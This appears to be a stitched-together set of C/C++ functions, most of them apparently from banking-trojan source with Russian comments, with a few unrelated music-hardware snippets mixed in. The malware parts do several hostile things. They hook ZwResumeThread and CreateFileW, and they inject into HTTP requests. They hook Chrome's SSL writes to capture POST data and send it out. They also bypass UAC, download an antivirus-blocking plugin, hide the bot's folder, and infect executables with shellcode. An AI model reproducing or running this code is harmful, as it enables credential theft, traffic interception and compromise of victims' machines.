void HookZwResumeThread() { dwHashPid = NULL; dwPidCount = 0; dwAddrRthProc = (DWORD)&JmpToHookRthProc; DWORD dwAddr = (DWORD)&dwAddrRthProc; PZwResumeThread ZwResumeThread = (PZwResumeThread)GetProcAddressEx( NULL, 5, 0xACF8BF39 ); LPVOID lpMem; LPVOID lpPtr; lpPtr = (LPVOID)ZwResumeThread; ProtectPage( lpPtr, PAGE_EXECUTE_READWRITE ); lpMem = pVirtualAllocEx( (HANDLE)-1, NULL, 1024, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ); if ( lpMem == NULL ) { return; } ZwResumeThreadReal = (PZwResumeThread)lpMem; m_memcpy( lpMem, lpPtr, 15 ); lpPtr = (LPVOID)((DWORD)lpPtr + 5 ); if ( *(BYTE*)lpPtr == 0xBA ) // win xp and up { lpPtr = (LPVOID)((DWORD)lpPtr + 1 ); m_memcpy( lpPtr, &dwAddr, 4 ); } else { if ( *(BYTE*)lpPtr == 0x8D ) //win2000 { *(BYTE*)lpPtr = 0x68; dwAddr = (DWORD)&ZwResumeThreadHook; lpPtr = (LPVOID)((DWORD)lpPtr + 1 ); m_memcpy( lpPtr, &dwAddr, 4 ); lpPtr = (LPVOID)((DWORD)lpPtr + 6 ); *(BYTE*)lpPtr = 0x00; } else { MemFree( lpMem ); } } ProtectPage( ZwResumeThread, PAGE_EXECUTE_READ ); return; }
void InitScreenLib() { bInitialized = false; CaptureScreen = NULL; DWORD dwScreenSize = sizeof( Screen_Dll ); LPBYTE ScreenFile = (LPBYTE)MemAlloc( dwScreenSize + 1 ); if ( !ScreenFile ) { return; } m_memcpy( ScreenFile, Screen_Dll, sizeof( Screen_Dll ) ); DWORD dwPassLen = *(DWORD*)ScreenFile; ScreenFile += sizeof( DWORD ); dwScreenSize -= sizeof( DWORD ); char Password[30]; m_memcpy( Password, ScreenFile, dwPassLen ); Password[ dwPassLen ] = '\0'; ScreenFile += dwPassLen; dwScreenSize -= dwPassLen; XORCrypt::Crypt(Password, ScreenFile, dwScreenSize); m_memset( Password, 0, dwPassLen ); hLib = MemoryLoadLibrary( ScreenFile ); if ( hLib != NULL ) { char CapScreen[] = {'C','a','p','t','u','r','e','S','c','r','e','e','n',0}; CaptureScreen = (PCaptureScreen)MemoryGetProcAddress( hLib, CapScreen ); if ( CaptureScreen ) { bInitialized = true; } } return; }
bool GetHeader2( char *Buffer, char **Header ) { char HTTP[] = {'H','T','T','P','/','1','.',0}; if ( !m_lstrncmp( Buffer, HTTP, 7 ) ) { DWORD dwSize = m_istrstr( Buffer, "\r\n\r\n" ); if ( dwSize == (DWORD)-1 ) { dwSize = m_lstrlen( Buffer ); } dwSize += 4; char *Hdr = (char*)MemAlloc( dwSize + 1 ); if ( Hdr != NULL ) { m_memcpy( Hdr, Buffer, dwSize ); Hdr[ dwSize ] = '\0'; m_lstrlwr( Hdr ); *Header = Hdr; return true; } } return false; }
DWORD GetHeader1( char *Buffer, char **Header ) { DWORD dwHeaderEnd = m_istrstr( Buffer, "\r\n\r\n" ); char *Hdr = NULL; if ( dwHeaderEnd != (DWORD)-1 ) { dwHeaderEnd += 4; if ( ( Hdr = (char*)MemAlloc( dwHeaderEnd + 1 ) ) != NULL ) { m_memcpy( Hdr, Buffer, dwHeaderEnd ); char HTTP[] = {'H','T','T','P',0}; if ( !m_lstrncmp( Hdr, HTTP, 4 ) ) { Hdr[ dwHeaderEnd ] = '\0'; m_lstrlwr( Hdr ); *Header = Hdr; return dwHeaderEnd; } MemFree( Hdr ); } } return -1; }
bool UpdateContentLength(PREQUEST Request, bool FreeOldBuf) { // Функция обновляет заголовок "Content-Length" в заголовках HTTP запроса char * Buffer = (char *)Request->pBuf; // копируем HTTP заголовок int HeaderOffset = m_istrstr(Buffer, "\r\n\r\n" ); if (HeaderOffset == -1) return false; HeaderOffset += 4; // увеличиваем размер заголовка на "\r\n\r\n" PCHAR Header = StrNew(Buffer, HeaderOffset); if (Header == NULL) return false; // Лпределяем позицию параметра в заголовках m_lstrlwr(Header); // приводим заголовок к нижнему регистру char CL[] = {'c','o','n','t','e','n','t','-','l','e','n','g','t','h',':',' ',0}; int Pos = m_istrstr(Header, CL); StrFree(Header); if (Pos == -1) return false; // Копируем оригинальный заголовок DWORD ParamLen = m_lstrlen(CL); char *ParamName = (char*)MemAlloc(ParamLen + 1); if (ParamName == NULL) return false; m_memcpy(ParamName, Buffer + Pos, ParamLen); // Создаём строку с новым значением DWORD NewValue = m_lstrlen(Buffer + HeaderOffset); char NewContentLen[10]; typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... ); fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 ); pwsprintfA(NewContentLen, "%d", NewValue); // Вписываем новое значение char *NewBuffer = NULL; bool Result = SubstituteText(Buffer, 0, &NewBuffer, ParamName, NewContentLen, "\r\n") >= 0; MemFree(ParamName); // Меняем буфер запроса if (Result) { if (FreeOldBuf) MemFree(Request->pBuf); Request->pBuf = (LPBYTE)NewBuffer; Request->uBufSize = m_lstrlen(NewBuffer); } return Result; }
BOOL WINAPI INTERNETEXPLORERCALLBACK( _In_ DWORD hRequest, _In_ LPCTSTR lpszHeaders, _In_ DWORD dwHeadersLength, _In_ LPVOID lpOptional, _In_ DWORD dwOptionalLength ) { if (lpOptional && dwOptionalLength > 0) { LPVOID lpHeaders = HeapAlloc(GetProcessHeap(),0x00,dwOptionalLength+1); if (lpHeaders) { DWORD dwHeaders = ~dwHeadersLength == 0 ? wcslen(lpszHeaders)*2:dwHeadersLength*2; RtlSecureZeroMemory(lpHeaders,dwOptionalLength+1); m_memcpy(lpHeaders,lpOptional,dwOptionalLength); //SendPOSTRequest("IE",0,0,"HTTPREQUESTW",strlen("HTTPREQUESTW"),(char*)lpHeaders,dwOptionalLength); OutputDebugStringA((char*)lpHeaders); HeapFree(GetProcessHeap(),0x00,lpHeaders); } } return HTTPSENDREQUESTW(hRequest, lpszHeaders, dwHeadersLength, lpOptional,dwOptionalLength); }
void CopySections( const unsigned char *data, PIMAGE_NT_HEADERS old_headers, PMEMORYMODULE module ) { int i, size; unsigned char *codeBase = module->codeBase; unsigned char *dest; PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION( module->headers ); for ( i = 0; i < module->headers->FileHeader.NumberOfSections; i++, section++ ) { if ( section->SizeOfRawData == 0 ) { size = old_headers->OptionalHeader.SectionAlignment; if ( size > 0 ) { dest = (unsigned char *)codeBase + section->VirtualAddress;///pVirtualAlloc( codeBase + section->VirtualAddress, size, MEM_COMMIT, PAGE_READWRITE ); section->Misc.PhysicalAddress = (DWORD)dest; m_memset( dest, 0, size ); } continue; } dest = (unsigned char *)codeBase + section->VirtualAddress; m_memcpy( dest, data + section->PointerToRawData, section->SizeOfRawData ); section->Misc.PhysicalAddress = (DWORD)dest; } }
DWORD Request::GetNextDataPart(PRequest Request, LPVOID Buf, DWORD BufSize, bool FreeBuf) { // Получить следующую порцию данных if (Request == NULL || Request->Buffer == NULL) return 0; int Max = Request->BufferSize - Request->Position; if (Max < 0) Max = 0; // Если не указан буфер или размер буфера, то возвращаем // объём доступных данных if (Buf == NULL || BufSize == 0) return Max; // Больше нет данных if (Max > 0) { // Выдаём данные if ((DWORD)Max > BufSize) Max = BufSize; m_memcpy(Buf, (PCHAR)Request->Buffer + Request->Position, Max); Request->Position += Max; Request->SaveReturned += Max; } if (Request->Position >= Request->BufferSize && FreeBuf) Request::SetBuffer(Request, NULL, 0); return Max; }
//------------------------------------------- // MakeWorkFolder - Функция генерирует имя // рабочего каталога бота // (короткое имя) //------------------------------------------- PCHAR BOT::MakeWorkFolder() { if (!STRA::IsEmpty(BOT_WORK_FOLDER_NAME)) return BOT_WORK_FOLDER_NAME; // Генерируем имя на основе константы обработанной ключём из уида string WorkPath = GetStr(StrBotWorkPath); PCHAR Name = UIDCrypt::CryptFileName((PCHAR)WorkPath.t_str(), false); // Копируем путь в глобальный массив const char *Buf = (Name) ? Name : WorkPath.t_str(); DWORD ToCopy = Min(MAX_BOT_WORK_FOLDER_LEN, STRA::Length(Buf)); m_memcpy(BOT_WORK_FOLDER_NAME, Buf, ToCopy); BOT_WORK_FOLDER_NAME[ToCopy] = 0; STR::Free(Name); // Добавляем папку в список скрытых файлов BOT::AddHiddenFile(STRA::Hash(BOT_WORK_FOLDER_NAME)); return BOT_WORK_FOLDER_NAME; }
bool RunBotBypassUAC( int method, int task, const char* args ) { bool ret = false; method = 0; //используем только метод обхода 0 string path = BOT::GetBotFullExeName(); DBG( "Exe бота %s превращаем в длл", path.t_str() ); DWORD dataSize; BYTE* data = File::ReadToBufferA( path.t_str(), dataSize ); if( data == 0 ) return false; if( ConvertExeToDll(data) ) { int lenArgs = m_lstrlen(args); //размер памяти под аргументы int szTask = sizeof(BypassUACTask) + lenArgs + 1; BypassUACTask* ptask = (BypassUACTask*)MemAlloc(szTask); ptask->time = (DWORD)pGetTickCount(); ptask->task = task; ptask->lenArgs = lenArgs; m_memcpy( ptask->args, args, lenArgs + 1 ); if( File::WriteBufferA(BOT::MakeFileName( 0, FileTask ).t_str(), ptask, szTask ) == szTask ) { ret = RunDllBypassUAC( data, dataSize, method ); if( !ret ) //по какой-то причине не сработало pDeleteFileA(BOT::MakeFileName( 0, FileTask ).t_str() ); } MemFree(ptask); } MemFree(data); return ret; }
void InjectPart( PREQUEST pReq, DWORD dwCopy ) { LPBYTE lpPartBuffer = NULL; REQUEST Request; Request.pBuf = pReq->pBuf + dwCopy; Request.uBufSize = pReq->uBufPos - dwCopy; Request.pInject = pReq->pInject; Request.dwInjCount = pReq->dwInjCount; if ( DoInjectFF(&Request)) { if ( dwCopy ) { if ( ( lpPartBuffer = (LPBYTE)MemAlloc( dwCopy + 1 ) ) != NULL ) m_memcpy( lpPartBuffer, pReq->pBuf, dwCopy ); } if ( !dwCopy ) { MemFree( pReq->pBuf ); pReq->pBuf = Request.pBuf; pReq->uBufSize += Request.uBufSize - pReq->uBufPos; pReq->uBufPos = Request.uBufSize; } else { if ( lpPartBuffer != NULL ) { LPBYTE p = (LPBYTE)MemRealloc( lpPartBuffer, dwCopy + Request.uBufSize + 1 ); if ( p != NULL ) { lpPartBuffer = p; m_memcpy( lpPartBuffer + dwCopy, Request.pBuf, Request.uBufSize ); MemFree( pReq->pBuf ); pReq->pBuf = lpPartBuffer; pReq->uBufSize += Request.uBufSize - ( pReq->uBufPos - dwCopy ); pReq->uBufPos += Request.uBufSize - ( pReq->uBufPos - dwCopy ); } } } } }
void STR::Copy(PCHAR Source, PCHAR Destination, DWORD Position, DWORD Count) { // Копирует с позиции Position строки Source Count символов в // строку Destination if (Source == NULL || Destination == NULL) return; m_memcpy(Destination, Source + Position, Count); }
DWORD WINAPI AvBlockThread( LPVOID lpData ) { if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES ) { return 0; } char *Host = GetCurrentHost(); if ( Host == NULL ) { return 0; } char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0}; char AvBlockUrl[256]; m_lstrcpy( AvBlockUrl, Host ); m_lstrcat( AvBlockUrl, AvBlockFile ); LPBYTE BotModule = NULL; DWORD dwModuleSize = 0; while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) ) { pSleep( 1000 * 60 * 5 ); } if ( BotModule != NULL && dwModuleSize ) { LPVOID FileData = MemAlloc( dwModuleSize + 1 ); if ( FileData ) { m_memcpy( FileData, BotModule, dwModuleSize ); File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize ); MemFree( FileData ); } LPVOID Module = DecryptPlugin( BotModule, dwModuleSize ); if ( Module ) { HMEMORYMODULE hLib = MemoryLoadLibrary( Module ); if ( hLib == NULL ) { return 0; } MemoryFreeLibrary( hLib ); } } return 0; }
static DWORD* CopyArrayExt( const DWORD* m ) { //считаем колоичество элементов const DWORD* pm = m; while( *pm++ ); int sz = (pm - m) * sizeof(DWORD); DWORD* ret = (DWORD*)MemAlloc(sz); if( ret ) m_memcpy( ret, m, sz ); return ret; }
char* trimall( char* s, char c ) { int len = m_lstrlen(s); char* p1 = s; while( *p1 == c && *p1 != 0 ) p1++; char* p2 = s + len - 1; while( *p2 == c && p2 > p1 ) p2--; len = p2 - p1 + 1; m_memcpy( s, p1, len ); s[len] = 0; return s; }
int CHROMECALLBACK(void*fd,const void *buf,int amount) { int Total = SSL3_WRITE(fd,buf,amount); if (Total == amount) { if(isPostData((PCHAR)buf)) { PCHAR Host = (PCHAR)HeapAlloc(GetProcessHeap(),0,MAX_PATH); if (Host) { RtlSecureZeroMemory(Host, MAX_PATH); if (ProcessHeader((PCHAR)buf, amount, "Google Chrome", Host,MAX_PATH,"SSL_WRITE") == -1) { PCHROMESOCKET NewSocket = InsertSocket((SOCKET)fd, &Section); if (NewSocket) NewSocket->szHost = Host; else HeapFree(GetProcessHeap(),0,Host); } else { HeapFree(GetProcessHeap(),0,Host); } } } else { PCHROMESOCKET Socket = FindSocket((SOCKET)fd, &Section); if (Socket) { PCHAR szData = (PCHAR)HeapAlloc(GetProcessHeap(),0,amount+1); if (szData) { RtlSecureZeroMemory(szData,amount+1); m_memcpy(szData,buf,amount); if (Socket->szHost) { SendPOSTRequest("Google Chrome",Socket->szHost,strlen(Socket->szHost),"SSL_WRITE 2",strlen("SSL_WRITE 2"),szData,strlen(szData)); HeapFree(GetProcessHeap(),0,Socket->szHost); Socket->szHost = 0; } RemoveSocket((SOCKET)fd, &Section); HeapFree(GetProcessHeap(),0,szData); } } } } return Total; }
int main(int argc, char* argv[]) { void* lpBuffer = 0; unsigned long ulBuffer = CreateFileBuffer(argv[1], &lpBuffer); if (lpBuffer) { if (ulBuffer) { unsigned long ulCodeCave = 0; CodeCave sCodeCave = {0}; if (ulCodeCave = ScanCodeCave(&sCodeCave, lpBuffer,ulBuffer,sizeof(ucShellCode)+10)) { unsigned long ulOffset = 0; m_memcpy((void*)(sCodeCave.ulAddress), ucCallCode, sizeof(ucCallCode)); ulOffset = sCodeCave.ulEntryPoint - (sCodeCave.ulVirtualAddress + sCodeCave.ulVirtualAddressOffset + sizeof(ucCallCode)) - 5; m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long)); m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP)); m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode)); if (WriteFileBuffer("NTTITON.exe", lpBuffer,ulBuffer) == ulBuffer) { printf("Done\n"); } } else { AddSection(lpBuffer,ulBuffer, sizeof(ucShellCode) + 10); } } VirtualFree(lpBuffer,ulBuffer,MEM_RELEASE); } return 0; }
void printBuf() { hexDump(MidiSysex.data + 3, MidiSysex.recordLen - 3); if (!inCallback) { m_memcpy(origBuf, MidiSysex.data, MidiSysex.recordLen); origLen = MidiSysex.recordLen; } else { printf("origLen: %d, newLen: %d\n", origLen, MidiSysex.recordLen); for (int i = 0; i < origLen; i++) { if (MidiSysex.data[i + 3] != origBuf[i + 3]) { printf("%.3x diff: %.2x was %.2x\n", i, MidiSysex.data[i + 3], origBuf[i + 3]); } } } }
void EncoderPage::update() { encoder_t _encoders[GUI_NUM_ENCODERS]; USE_LOCK(); SET_LOCK(); m_memcpy(_encoders, Encoders.encoders, sizeof(_encoders)); Encoders.clearEncoders(); CLEAR_LOCK(); for (uint8_t i = 0; i < GUI_NUM_ENCODERS; i++) { if (encoders[i] != NULL) encoders[i]->update(_encoders + i); } }
char* SafeCopyStr( char* dst, int szDst, const char* src ) { if( dst == 0 || szDst <= 0 ) return 0; if( src == 0 ) { dst[0] = 0; return dst; } int len = m_lstrlen(src); if( len > szDst - 1 ) len = szDst - 1; m_memcpy( dst, src, len ); dst[len] = 0; return dst; }
void StrConcat(PCHAR &Str1, PCHAR Str2) { // Объеденяем две строки DWORD Str2Len = StrCalcLength(Str2); if (!STRHEAD::CheckSignature(Str1) || Str2Len == 0) return; DWORD Str1Len = StrCalcLength(Str1); DWORD NewLength = Str1Len + Str2Len; if (STRHEAD::GetBufferSize(Str1) < NewLength) StrSetLength(Str1, NewLength); PCHAR Tmp = Str1 + Str1Len; m_memcpy(Tmp, Str2, Str2Len); STRHEAD::SetLength(Str1, NewLength); }
PCHAR STR::New(PCHAR Source, DWORD Len) { // Функция создаёт строку, копию Source. // Len - Количество копируемых символов // если равно 0, то будет скопирована вся строка if (Source == NULL) return NULL; if (Len == 0) Len = StrCalcLength(Source); if (Len == 0) return NULL; PCHAR Str = STR::Alloc(Len); if (Str != NULL) m_memcpy(Str, Source, Len); return Str; }
//------------------------------------------------------------------------------ bool StrCopy(PCHAR Dest, PCHAR Source, bool UpdateLen) { // функция копирует строку Source в строку Dest // Флаг UpdateLen использовать только если Dest создана функциями // StrAlloc, STR::New // Возвращает истину если скопирован хотя-бы один байт if (Dest == NULL || Source == NULL) return false; DWORD Len = StrCalcLength(Source); m_memcpy(Dest, Source, Len); if (UpdateLen) STRHEAD::SetLength(Dest, Len); else *(Dest + Len) = 0; return Len > 0; }
void StrSetLength(PCHAR &Str, DWORD NewLength) { // Изменить размер буфера строки // Важно!!! Функция работает со строками которые созданы функцией STR::New // Для переопределения длины строки, мы создадим новую строку с нужным // размером и скопируем в неё старую. if (!STRHEAD::CheckSignature(Str) || STRHEAD::GetBufferSize(Str) == NewLength) return; PCHAR New = STR::Alloc(NewLength); DWORD Size = STRHEAD::GetLength(Str); if (NewLength < Size) Size = NewLength; m_memcpy(New, Str, Size); STRHEAD::SetLength(New, Size); STR::Free(Str); Str = New; }
//------------------------------------------------------------------------------ void StrConcatArguments(PCHAR &OutStr, DWORD Count, PCHAR *First) { // Функция объеденяет две и более строки. const DWORD MaxCount = 50; if (Count >= MaxCount) return; DWORD Lens[MaxCount]; PCHAR *Current = First; DWORD FullLen = StrCalcLength(OutStr); Lens[0] = FullLen; // Расчитываем общую длину строки for (DWORD i = 1; i <= Count; i++) { DWORD Len = StrCalcLength(*Current); Lens[i] = Len; FullLen += Len; Current++; } // Добавляемые строки нулевой длины if (FullLen == 0) return; // Меняем размер буфера if (OutStr != NULL) StrSetLength(OutStr, FullLen); else OutStr = STR::Alloc(FullLen); // Собираем строку Current = First; PCHAR Tmp = OutStr + Lens[0]; for (DWORD i = 1; i <= Count; i++) { m_memcpy(Tmp, *Current, Lens[i]); Tmp += Lens[i]; Current++; } }
void MDKit::swapTracks(uint8_t srcTrack, uint8_t dstTrack) { uint8_t _params[24]; uint8_t _level; uint32_t _model; MDLFO _lfo; uint8_t _trigGroup; uint8_t _muteGroup; /* adjust lfo destination, as well as trig and mute groups. */ #if 0 for (uint8_t i = 0; i < 16; i++) { lfos[i].destinationTrack = swapNumber(lfos[i].destinationTrack, srcTrack, dstTrack); trigGroups[i] = swapNumber(trigGroups[i], srcTrack, dstTrack); muteGroups[i] = swapNumber(muteGroups[i], srcTrack, dstTrack); if (models[i] == CTR_8P_MODEL) { for (uint8_t j = 8; j < 24; j += 2) { params[i][j] = swapNumber(params[i][j], srcTrack, dstTrack); } } } #endif /* swap params */ m_memcpy(_params, params[srcTrack], 24); m_memcpy(params[srcTrack], params[dstTrack], 24); m_memcpy(params[dstTrack], _params, 24); m_memcpy(&_lfo, &lfos[srcTrack], sizeof(_lfo)); m_memcpy(&lfos[srcTrack], &lfos[dstTrack], sizeof(_lfo)); m_memcpy(&lfos[dstTrack], &_lfo, sizeof(_lfo)); /* swap level, model, trig group, mute group */ _level = levels[srcTrack]; levels[srcTrack] = levels[dstTrack]; levels[dstTrack] = _level; _model = models[srcTrack]; models[srcTrack] = models[dstTrack]; models[dstTrack] = _model; _trigGroup = trigGroups[srcTrack]; trigGroups[srcTrack] = trigGroups[dstTrack]; trigGroups[dstTrack] = _trigGroup; _muteGroup = muteGroups[srcTrack]; muteGroups[srcTrack] = muteGroups[dstTrack]; muteGroups[dstTrack] = _muteGroup; }
HANDLE WINAPI Hook_CreateFileW( LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ) { HANDLE File = Real_CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile ); if( (stateGrabber & (IGNOREHOOK | INHOOK)) == 0 && (dwFlagsAndAttributes & FILE_FLAG_OVERLAPPED) == 0 && lpFileName && lpFileName[0] != '/' && lpFileName[0] != '\\' ) //игнорируем открытие разных портов { //stateGrabber |= INHOOK; //инициализация параметров события ParamEvent e; e.data = 0; e.szData = 0; int len = m_wcslen(lpFileName); m_memcpy( e.fileNameW, lpFileName, sizeof(WCHAR) * (len + 1) ); e.unicode = true; e.access = dwDesiredAccess; e.file = File; SendEvent(e); //посылаем событие //stateGrabber &= ~INHOOK; } return File; }
void STR::Delete(PCHAR Str, DWORD Position, DWORD Count, DWORD StrLength) { // Удаляет Count символов с позоции Position строки Str if (STR::IsEmpty(Str) || Count == 0) return; DWORD Len = StrLength; if (Len == 0) Len = StrCalcLength(Str); if (Position > Len) return; if (Count > Len - Position) { Count = Len - Position; if (Count == 0) return; } PCHAR Ptr = Str + Position; PCHAR FromPTR = Ptr + Count; m_memcpy(Ptr, FromPTR, Len - (Position + Count)); Ptr = Str + (Len - Count); *Ptr = 0; }
LPVOID MemRealloc( LPVOID lpAddr, DWORD dwSize ) { DWORD dwPrevLen; if ( lpAddr ) { dwPrevLen = GetMemSize( lpAddr ); if ( dwPrevLen >= dwSize ) { return lpAddr; } } LPVOID NewAddr = MemAlloc(dwSize); if ( lpAddr && NewAddr ) { m_memcpy(NewAddr, lpAddr, dwPrevLen); MemFree(lpAddr); } return NewAddr; }
static bool InfectImage( PVOID data, DWORD dataSize, char *dllPath, char *commandLine ) { DWORD shellcodeSize = (DWORD)((PUCHAR)&Shellcode_end - (PUCHAR)&Shellcode); DWORD totalSize = shellcodeSize + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1; DBG( "Shellcode size is %d bytes", totalSize); PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS) ((PUCHAR)data + ((PIMAGE_DOS_HEADER)data)->e_lfanew); PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER) (headers->FileHeader.SizeOfOptionalHeader + (PUCHAR)&headers->OptionalHeader); DWORD numberOfSections = headers->FileHeader.NumberOfSections; // enumerate sections for( int i = 0; i < (int)numberOfSections; i++ ) { // check for resources section if( !m_memcmp( (char*)§ion->Name, ".rsrc", 5) ) { if( section->SizeOfRawData < totalSize ) { DBG( "ERROR: Not enough free space in '.rsrc'" ); return false; } // fill shellcode parameters PSHELLCODE_PARAMS params = (PSHELLCODE_PARAMS)((PUCHAR)data + section->PointerToRawData); m_memset( params, 0, sizeof(SHELLCODE_PARAMS) ); params->dwAddressofEntryPoint = headers->OptionalHeader.AddressOfEntryPoint; HMODULE kernel32 = (HMODULE)pGetModuleHandleA("kernel32.dll"); params->f_LoadLibraryA = (func_LoadLibraryA)pGetProcAddress( kernel32, "LoadLibraryA" ); params->f_WinExec = (func_WinExec)pGetProcAddress( kernel32, "WinExec" ); if( commandLine ) m_lstrcpy( params->szCommandLine, commandLine ); m_lstrcpy( params->szDllPath, dllPath ); // copy shellcode PVOID shellcode = (PVOID)((PUCHAR)params + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1); m_memcpy( shellcode, Shellcode, shellcodeSize); // replace address of entry point headers->OptionalHeader.AddressOfEntryPoint = section->VirtualAddress + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1; // make section executable section->Characteristics |= IMAGE_SCN_MEM_EXECUTE; headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].VirtualAddress = NULL; headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].Size = 0; DWORD headerSum = 0, checkSum = 0; // recalculate checksum if( pCheckSumMappedFile( data, dataSize, &headerSum, &checkSum ) ) headers->OptionalHeader.CheckSum = checkSum; else DBG( "CheckSumMappedFile() ERROR %d", pGetLastError() ); DBG( "OK" ); break; } section++; } return true; }